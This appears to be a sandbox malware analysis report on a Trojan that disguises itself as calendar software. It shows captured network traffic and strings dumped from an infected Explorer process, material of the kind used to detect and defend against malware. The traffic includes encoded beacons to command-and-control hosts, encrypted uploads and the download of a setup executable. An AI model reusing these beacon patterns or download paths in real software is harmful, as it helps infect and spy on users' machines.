Accept-Ranges: bytes
ETag: "0764a95199ad11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:52 GMT
Connection: keep-alive
Content-Length: 600312
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.*.%.y.%.y.%.y.].y.%.y.].y.%.y.].y9%.y...y.%.y.%.y.%.y.].y.%.y.w.y.%.y.].y.%.yRich.%.y................PE..L...Z.gV.................X..........i........p....@..........................`............@..........................................P..............0...............ps..............................8...@............p...............................text....V.......X.................. ..`.rdata..V....p.......\..............@..@.data...|?..........................@....rsrc........P......................@..@.reloc..V@.......B..................@..B........................................................................................................................................................................................................................................................................................................................................................3........t.5 .....t...5 .........t...5 .........t...5 .........t...5 .........t...5 .........t...5 .........t...5 ...........8E.A........u......3.3...v$W..$......<13..........3...8E.A;.r._.......SU.l$ .E.V..3.W.F......N..~..X..t$..L$ ..._D...~..r..?.G.P.'......@..G........E...........3..D$ ............. ..D$...... ..D$...... .._..D$..;u.v..4....}..r..E....E...02O..T$.....K.;E.v.......}..r..M....M..D$..T$......2O......;E.v.......}..r..M....M..D$..T$......2O.....K.;E.v.......}..r..M....M..D$......2O.....K.
<<< skipped >>>
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDMzMUQzQ0VBQTM1RUNEMDQ2MkQ0Q0Q3MjA5QzgzMTI2NzUwN0E1M0FGRkQ4RjlEMTk1OTVDNDg1MDUwMTkwMEFGNDc2OTBGOUUzMUU3NTREMTE3RkJBM0I4RDA0NkE5QjA= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /reportInstall.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNTEyM0U1Q0FDODhFRjdFN0MxNEE5NkY3NzMxQUNEQTY5RTY0MTEwOEI5MDkyQzg5ODE1NDcxQTQwMUFBRkYxRTFBRDFBOTYyMkZBRkVBMzI4MERBQUNDQ0Y2MTk3OUY3NjRFM0FGNzZFMzc4M0Q1MjJBM0YyRDMzNTBEMDY4MjI= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=C528ED7CB09146c38C186BBBE233AE4A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 468
Connection: Keep-Alive
--C528ED7CB09146c38C186BBBE233AE4A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream
/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^..._(......j.?a$.<.-N.L'.%j.S=>;C.P_.Q.=.ix.Hc.=..wf.X*..;>.H0^~P.9e.D...&x.H(Pl..ko..a..86..d.:..w(.]=1E38566
--C528ED7CB09146c38C186BBBE233AE4A--
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:07 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:07 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
GET /CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe HTTP/1.1
User-Agent: HTTP_CLIENT
Host: download.intechnical.online
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 03 May 2016 01:56:01 GMT
Server: PWS/8.1.36
X-Px: rf-ht h0-s1105.v0-mow ( h0-s1170.v0-mow), ht-d h0-s1170.v0-mow.cdngp.net
ETag: "a612003-5bb3c8-529aa33cff880"
Cache-Control: max-age=604800
Expires: Sun, 08 May 2016 19:41:41 GMT
Age: 108860
Accept-Ranges: bytes
Content-Length: 6009800
Content-Type: application/x-msdownload
Last-Modified: Tue, 19 Jan 2016 06:44:34 GMT
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.................................c.\...@.................................@............\..........@.[......`.......................................................................................text....r.......t.................. ..`.rdata..n .......,...x..............@..@.data.... ..........................@....ndata...................................rsrc....\.......^..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>
POST /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: int.dpool.sina.com.cn
HTTP/1.1 200 OK
Server: Tengine
Date: Tue, 03 May 2016 01:55:47 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
SINA-LB:aGEuMTE4LmcyLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:OWJmMjk2Y2UgMCAwIDAgNSAwCg==
1.-1.-1...............
POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDM0QTgwQkI4OUI1QTIxODYwRjFBQjM1RjIwMThCOUYyMTkzQjZFODExM0U2MENDMjc5NERDNDQwM0EzNzVGNzZCODJCODdDRUJGMkEwNUEwQjU4MDVBMzYxRjE5QkFBRkY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /xiezai.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY4QzMwQkJBRUIwNzA1QTEyNzBDM0RFQTk1OTJDN0ZCMzdDQTY3QzRGN0I0RDA2NDAzMzc0M0IyRTYzQjk0OTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /down.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMEIwNkU4RDJCMTk4QUU0QUNBQkQxQzM1RTA0QzVBQzU= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=26BC8369D6944cca92B4EAA85508054A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 450
Connection: Keep-Alive
--26BC8369D6944cca92B4EAA85508054A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream
/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^...ok.L...=4.P(Ml^.tf..5..v`.H&^>..~d.n"..v`..o.;..~r..oT.-*.H0^(..wU.N0..86..o.'..fw=1E38566
--26BC8369D6944cca92B4EAA85508054A--
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:05 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:05 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..
POST /open/51486.ini HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: wsxc123.cc
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:49 GMT
Connection: close
Content-Length: 1202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>..<title>405 - .................... HTTP ......</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>..........</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>405 - .................... HTTP ......</h2>.. <h3>....................................................(HTTP ....)..</h3>.. </fieldset></div>..</div>..</body>..</html>....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.exe_660:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
BROWSEUI.dll
BROWSEUI.dll
GDI32.dll
GDI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
msvcrt.dll
msvcrt.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHDOCVW.dll
SHDOCVW.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
UxTheme.dll
UxTheme.dll
FTSSh
FTSSh
t0SSh
t0SSh
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
SShwk
SShwk
98~%SP
98~%SP
ExplorerStartMsgLoop
ExplorerStartMsgLoop
PSSh;
PSSh;
6SSSSh
6SSSSh
SSSSh
SSSSh
SPSSSShL
SPSSSShL
u%SSh
u%SSh
t.WWWW
t.WWWW
xpsp2res.dll
xpsp2res.dll
xpsp3res.dll
xpsp3res.dll
tbSSh
tbSSh
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel
kernel32.dll
kernel32.dll
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
NetGetJoinInformation
NetGetJoinInformation
WINMM.dll
WINMM.dll
SETUPAPI.dll
SETUPAPI.dll
WINSTA.dll
WINSTA.dll
OLEACC.dll
OLEACC.dll
USERENV.dll
USERENV.dll
ntdll.dll
ntdll.dll
RegEnumKeyExW
RegEnumKeyExW
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyW
RegEnumKeyW
RegCloseKey
RegCloseKey
RegCreateKeyW
RegCreateKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
OffsetViewportOrgEx
OffsetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
SetProcessShutdownParameters
SetProcessShutdownParameters
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
CreateIoCompletionPort
CreateIoCompletionPort
ShellExecuteExW
ShellExecuteExW
SHRegCloseUSKey
SHRegCloseUSKey
SHRegCreateUSKeyW
SHRegCreateUSKeyW
AssocQueryKeyW
AssocQueryKeyW
SHRegOpenUSKeyW
SHRegOpenUSKeyW
SHDeleteKeyW
SHDeleteKeyW
TileWindows
TileWindows
ExitWindowsEx
ExitWindowsEx
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
EnumChildWindows
EnumChildWindows
GetKeyState
GetKeyState
GetAsyncKeyState
GetAsyncKeyState
CascadeWindows
CascadeWindows
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
explorer.pdb
explorer.pdb
name="Microsoft.Windows.Shell.explorer"
name="Microsoft.Windows.Shell.explorer"
version="5.1.0.0"
version="5.1.0.0"
Windows Shell
Windows Shell
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
]]"```^]]\
]]"```^]]\
3333333330
3333333330
3333330
3333330
333333334
333333334
)@. '5 !*
)@. '5 !*
.DEHHF>?/
.DEHHF>?/
2
2
&$%Uooqkezs
&$%Uooqkezs
['$$#%&(4
['$$#%&(4
3333333333333333333
3333333333333333333
33333333333330
33333333333330
7''''))
7''''))
3'')))33.
3'')))33.
222`444(555
222`444(555
%%%{///-
%%%{///-
000000000
000000000
00000000
00000000
`[66...00
`[66...00
0000000
0000000
`]66./.000
`]66./.000
/./././././././.
/./././././././.
66///0000
66///0000
0000000000000
0000000000000
0000000000
0000000000
6666,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,0.010.010.010.010.010.010.010.010.010.010.001
6666,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,0.010.010.010.010.010.010.010.010.010.010.001
4366666666K,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6.010.010.010.010.010.010.010.010.010.010.000
4366666666K,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6.010.010.010.010.010.010.010.010.010.010.000
:;
:;
) ) ) ) )
) ) ) ) )
|2222'2'2'2'2'2'2'2'2'2'2'2'2'2'2'2',),),),),),),),),),),),),),),),),),),),),),,
|2222'2'2'2'2'2'2'2'2'2'2'2'2'2'2'2',),),),),),),),),),),),),),),),),),),),),),,
22222222222
22222222222
3333333
3333333
.SB99;;;99twv}ut{oxt~
.SB99;;;99twv}ut{oxt~
.SB;;;:::2:w}{{qddgghg
.SB;;;:::2:w}{{qddgghg
" """ """ """ """ "" #
" """ """ """ """ "" #
""" """ """ "#
""" """ """ "#
.SG>''';;9::p
.SG>''';;9::p
:5:5:5:5:5:5:5:5:5:5#"
:5:5:5:5:5:5:5:5:5:5#"
# # # # # # # # # # # # # # # # # # # # # ##$
# # # # # # # # # # # # # # # # # # # # # ##$
( # # # # # # # # # # # # # # # # # # # # ###
( # # # # # # # # # # # # # # # # # # # # ###
1232123212321232123
1232123212321232123
(&(((&(((&(((&(((&((&&)
(&(((&(((&(((&(((&((&&)
&(((&(((&(((&()
&(((&(((&(((&()
`,''')))
`,''')))
'4,4'4,4'4,4'4,4'4,4)(
'4,4'4,4'4,4'4,4'4,4)(
55///0000
55///0000
5555-5-5-5-5-5-5-5-5-5-5-5-5-5-5-5-0
5555-5-5-5-5-5-5-5-5-5-5-5-5-5-5-5-0
555555555
555555555
55555555
55555555
5555555
5555555
14441444144414441
14441444144414441
4343434343434343
4343434343434343
5555555555555
5555555555555
5555555555
5555555555
-,-,-,-,-,-,-,-,-,-,-*.
-,-,-,-,-,-,-,-,-,-,-*.
..............................JFJFJFJFJFJFJFJFJFJFJ.-
..............................JFJFJFJFJFJFJFJFJFJFJ.-
{22*2*2*2*2*2*2*2*2*2*2*2*2*2*2*2*.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-../
{22*2*2*2*2*2*2*2*2*2*2*2*2*2*2*2*.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-../
|ujjjjuhF..BBBBBBBBBBBBT
|ujjjjuhF..BBBBBBBBBBBBT
~j|F.BB*BBB*BBB*Bwop
~j|F.BB*BBB*BBB*Bwop
&!!!&!!!&
&!!!&!!!&
44466666
44466666
44444444416
44444444416
4446666
4446666
66666666
66666666
|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |=
|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |=
|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |=
